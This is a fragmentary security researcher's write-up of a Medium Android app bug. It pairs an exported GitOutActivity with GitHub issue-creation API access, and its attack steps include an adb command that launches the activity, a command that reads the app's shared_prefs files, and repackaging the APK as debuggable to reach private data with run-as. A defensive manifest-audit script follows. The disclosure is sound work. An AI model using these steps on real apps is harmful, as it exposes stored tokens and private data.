Medium Hacking Stories #1: Access to Internal API calls via Camouflaged GitHub Activity

Hacking Medium #1: Exported Android Activity Fiasco

Medium Hacking Stories by Piyush Raj ~ Rex (0x48piraj)
<manifest ...>
    <application ...>
        <activity android:name=".ExampleActivity" />
        ...
    </application>
    ...
</manifest>

Summary

// Retrofit-style API interface as recovered from the app. Imports are assumed
// (Retrofit 2 annotations, OkHttp ResponseBody, RxJava Observable); the original
// listing shows only the interface body.
import io.reactivex.Observable;
import okhttp3.ResponseBody;
import retrofit2.http.Body;
import retrofit2.http.Header;
import retrofit2.http.POST;

public interface GithubApi {
    // Creates an issue under the GitHub "Medium/tickets" repository path.
    // The Authorization header is where the GitHub token is supplied.
    @POST("repos/Medium/tickets/issues")
    Observable<ResponseBody> createIssue(@Header("Authorization") String str, @Body CreateGithubIssueRequest createGithubIssueRequest);
}
$ adb shell am start -n com.medium.reader/com.medium.android.donkey.meta.gitout.GitOutActivity

Exploit In Action

InvokeGitOutActivity Proof of Concept’s Result

Where’s the token then?

cd /data/data/com.medium.reader/shared_prefs
su -c cat *.xml
0x48piraj~Rex:/ $ ls /data/data/com.medium.reader
ls: /data/data/com.medium.reader: Permission denied
0x48piraj~Rex:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0

Say hello to “Debuggable”

android:debuggable, FTW!
$ apktool d com.medium.reader.apk
<manifest ...>
...
<application ... android:debuggable="true">
...
</application>
</manifest>
$ apktool b com.medium.reader/ -o com.medium.reader.modified.apk
$ java -jar sign.jar com.medium.reader.modified.apk
$ adb install com.medium.reader.modified.apk
$ adb run-as com.medium.reader
> ls
cache
code_cache
lib
shared_prefs
> id
id=10170(u0_a170) gid=10170(u0_a170) groups=10170(u0_a170),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:untrusted_app:s0:c170,c256,c512,c768
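The two manifest conditions this write-up chains together, an activity reachable from other apps and an `android:debuggable="true"` application element, are both visible in a static scan of `AndroidManifest.xml`. The checker below is an added example for this post, not code from the author or from the Medium app; the manifest it parses is a constructed sample, not the real `com.medium.reader` manifest. It applies the framework's export rule (an explicit `android:exported` wins; otherwise a component with an `<intent-filter>` is exported and one without is not), skips the launcher activity, which is expected to be exported, and flags exported components that declare no `android:permission`.

```python
"""Static audit of an AndroidManifest.xml for the weaknesses discussed above:
exported components without a permission guard, and android:debuggable="true".

Example code added to this write-up; it is not part of the original post.
SAMPLE_MANIFEST is a constructed sample, not the Medium app's manifest."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
LAUNCHER_CATEGORY = "android.intent.category.LAUNCHER"

# Constructed sample: one launcher activity (expected to be exported), one activity
# exported explicitly with no permission, one private activity, one guarded activity.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app">
  <application android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".InternalActivity" android:exported="true"/>
    <activity android:name=".PrivateActivity"/>
    <activity android:name=".GuardedActivity" android:exported="true"
              android:permission="com.example.app.INTERNAL"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an attribute from the android: namespace (ElementTree keys it by URI)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component):
    """Framework default: explicit android:exported wins; otherwise a component
    with an <intent-filter> is exported and one without is not."""
    explicit = _attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return component.find("intent-filter") is not None


def is_launcher(component):
    """True if any intent-filter carries the LAUNCHER category."""
    for flt in component.findall("intent-filter"):
        for cat in flt.findall("category"):
            if _attr(cat, "name") == LAUNCHER_CATEGORY:
                return True
    return False


def audit_manifest(xml_text):
    """Return a list of human-readable findings for the manifest text."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    findings = []
    if app is None:
        return findings

    # Debuggable release builds let `adb run-as` and debuggers reach app-private data.
    if (_attr(app, "debuggable") or "").lower() == "true":
        findings.append("application is android:debuggable=\"true\"")

    for tag in ("activity", "activity-alias", "service", "receiver"):
        for comp in app.findall(tag):
            if not is_exported(comp) or is_launcher(comp):
                continue
            if _attr(comp, "permission") is None:
                findings.append(
                    "%s %s is exported without android:permission" % (tag, _attr(comp, "name"))
                )
    return findings


if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print("[!] " + finding)
```

Run against a real manifest by feeding it the output of `apktool d` (the decoded `AndroidManifest.xml` is plain XML); a clean result means every exported component is either the launcher or sits behind a permission, and the build is not debuggable.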

Aftermath

I will release the other chained bugs as soon as the case is closed and all the vulnerabilities are mitigated.

Piyush Raj ~ Rex

Google Code-In C. Winner. GsOCer ‘19. Independent Security Researcher. Have hacked Medium, Mozilla, Opera & many more. Personal Website: https://0x48piraj.com